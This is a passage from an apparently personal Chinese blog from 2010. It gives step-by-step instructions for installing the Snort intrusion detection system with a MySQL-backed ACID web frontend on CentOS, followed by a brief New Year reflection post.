wget http://bart.eaccelerator.net/source/0.9.5.3/eaccelerator-0.9.5.3.tar.bz2
wget http://pecl.php.net/get/PDO_MYSQL-1.0.2.tgz
wget http://q.kukafie520.net/soft/linux/nginx_php/imagick/ImageMagick.tar.gz
wget http://pecl.php.net/get/imagick-2.2.2.tgz
[/code]

snort下载地址:http://www.snort.org

adodb下载地址:http://phplens.com

acid下载地址:http://acidlab.sourceforge.net

jpgraph下载地址:http://jpgraph.techuk.com

先把服务器所有程序在线更新一次
[code]
sudo -s
LANG=C
yum -y install gcc gcc-c++ autoconf libjpeg libjpeg-devel libpng libpng-devel freetype freetype-devel libxml2 libxml2-devel zlib zlib-devel glibc glibc-devel glib2 glib2-devel bzip2 bzip2-devel ncurses ncurses-devel curl curl-devel e2fsprogs e2fsprogs-devel krb5 krb5-devel libidn libidn-devel openssl openssl-devel openldap openldap-devel nss_ldap openldap-clients openldap-servers
[/code]

详细centos下安装mysql及nginx请参考
http://blog.s135.com/nginx_php_v5/9/1/

以下主讲snort的安装方法

先解压缩
[code]
tar zxvf snort-2.1.8.5.2.tar.gz

[/code]

指定安装目录
[code]
./configure –with-mysql=/usr/local/mysql

[/code]

make

make install

[color=Red]注如在安装时提示libcap不能安装的时候,先运行yum install libcap更新libcap包
然后在执行yum install libcap-devel安装完成就OK了[/color]

解压缩rules

解压缩后会在本目录下生成rules文件夹和doc文件夹,将这两个文件夹移动到你安装的snort目录

mv rules/ /usr/local/webserver/snort/
进到snort的安装包目录的etc下,将所有文件复制到snort安装目录下

开始配置snort的配置文件

想显示行号直接输入:set number就出现了行号

找到696行,配置数据库的用户名和密码

进入mysql数据库,建立snort的数据库

source建立脚本
而这个creare_mysql;文件就在你解压的snort目录下的schemas目录下,我这里的snort的版本号输错,所以下面报错了,当然你要输对你自己的版本号也就是你解压的文件夹的名字就可以了

退出数据库,用以下两条命令启动snort
[code]
snort -d -h 100.100.100.0/24 -l /data1/logs/snort -c /usr/local/webserver/snort/snort.conf -i eth0 -A full
snort -d -D -c /usr/local/webserver/snort/snort.conf
[/code]

然后解压jpgraph到nginx指定的目录

解压缩acid和adodb两个包移动到nginx指定目录

配置acid的配置文件

在12行指定adodb的绝对目录

32行开始指定数据库的用户名和密码及数据库名

第69行指写jpgraph的目录

一切完工后,在IE地址栏输入acid的访问地址

点击setup page开始安装

点击create acid创新库结构

出现以下页面就表示成功

返回acid目录

当你看到如入界面时,你的snort的入侵检测系统已经完成了,还等什么,快去体验吧

一月 7th, 2010

Posted In: 未分类

2010,新的一年,留个印

2009最大的收获是爱情,我懂的了什么是爱一个人,什么是被爱

2009压力是工作,压力成为动力,让我变的更强,我学会了太多的东西

2009忘不了的是我的家人,永远在我需要的时候第一个帮我

2009我感谢陪我一起走过这段日子的朋友,是你让我生活更有目标,坚定了我的想法,非常感谢

2009,感受太多,学到了太多

一月 1st, 2010

Posted In: 未分类

无觅相关文章插件,快速提升流量